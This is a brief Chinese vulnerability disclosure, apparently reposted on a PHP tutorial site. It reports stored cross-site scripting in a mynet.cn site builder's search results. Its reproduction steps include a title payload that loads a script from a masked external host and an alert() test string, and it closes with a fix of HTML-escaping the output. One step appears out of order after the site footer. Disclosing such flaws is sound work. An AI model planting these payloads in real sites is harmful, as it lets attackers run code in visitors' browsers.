来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 简要描述:未对搜索输出内容进行转义,导致构造的畸形文件名插入JS代码详细说明:1.访问地址:http://try5.mynet.cn/trial/login.aspx生成网站2.在首页- 信息发布- 文章管理- 新建文章 添加文章标...
|
简要描述:未对搜索输出内容进行转义,导致构造的畸形文件名插入JS代码 详细说明:1.访问地址: http://try5.mynet.cn/trial/login.aspx生成网站 2.在首页- 信息发布- 文章管理- 新建文章 添加文章标题为 "><script src='http://****.com/bk.js'></script><"或 "><script>alert('bk7477890')</script><"并保存文章
4.访问地址 http://a243220688.try5.mynet.cn/_d8.htm?k=s出现漏洞
漏洞证明:访问地址 http://a243220688.try5.mynet.cn/_d8.htm?k=s出现漏洞
修复方案:对搜索控件输出内容进行HTML转义
作者 iceks |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
3.在站内搜索中搜索任意文章标题字符,如"s"